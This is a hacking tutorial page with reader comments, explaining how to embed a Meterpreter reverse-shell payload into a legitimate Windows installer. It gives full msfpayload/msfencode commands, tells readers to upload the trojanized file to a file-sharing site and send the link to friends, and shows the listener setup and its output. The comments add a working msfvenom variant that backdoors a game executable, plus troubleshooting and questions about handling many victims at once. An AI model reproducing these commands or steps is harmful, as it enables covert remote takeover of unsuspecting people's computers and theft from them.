How To: Embed a Backdoor in an Exe File

Embed a Backdoor in an Exe File

Welcome back Hackers!

We have embed a Backdoor in to a PDF file,Android package File.
In this tutorial we will embed a Backdoor in to an exe file.

lets start,

Open msfconsole

To create the embed exe we need the executable file.I am using idm to create the Backdoor.

Lets create the Backdoor,

1.We will use shikataganai to encode the Backdoor

msfpayload windows/meterpreter/reversetcp LHOST=192.168.186.128 LPORT=443 R | msfencode-e x86/shikataganai -t exe -x /root/idman.exe -o /root/Backdoor.exe

2.Upload the file to Speedyshare

https://www.speedyshare.com

3.Share the Link with your Friends

4.Now we can set up a listener
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reversetcp
PAYLOAD => windows/meterpreter/reverse
tcp
msf exploit(handler) > set LHOST 192.168.186.128
LHOST => 192.168.186.128
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

* Started reverse handler on 192.168.1.101:443
* Starting the payload handler...

when the victim open the File we will get the meterpreter prompt

As you can see we got the meterpreter prompt.

The backdoor do not need any Vulnerability.Works on all patched and unpatched systems,only thing Want to evade the antivirus.

keep coming!

Thank You!
sudharsan..

14 Comments

With which platforms does this .exe file work?

Windows.

ghost_

Heads-up: Piping MSFPayload and MSFEncode is deprecated. Use MSFVenom instead.

Mind want to make that edit.

Yeah i noticed but maybe he has his reasons.

# Sergeant

I got This error:
sh: 1: msfencode: not found
what should I do?

use MSFVenom . Although the above command didnt work for me. Heres the one which worked for me " msfvenom -a x86 --platform windows -x PES2016.exe -k -p windows/meterpreter/reversetcp lhost=192.168.0.103 lport=443 -e x86/shikataganai -i 3 -b "\x00" -f exe -o PES2016x.exe " . And the file didnt run on windows .. Producing an error . I dont know if it is because of Windows 10. Good luck . Lemme know if it worked for you :) Peace .

"Sending stage (885806 bytes) to 192.168.0.40"

after this point my meterpreter stop working and i don't receive the second message: "Meterpreter session 1 opened (192.168.0.40:443 -> 192.168.0.104:1043)"

what can i do?

Can I use ipv6 address instead of ipv4 in lhost? In Order to skip port forwarding?

Many payloads support IPV6

What if I send the file to multiple devices and all the agents connect to the handler at the same time?

how can I set a payload in an already existent exe?

Share Your Thoughts

  • Hot
  • Latest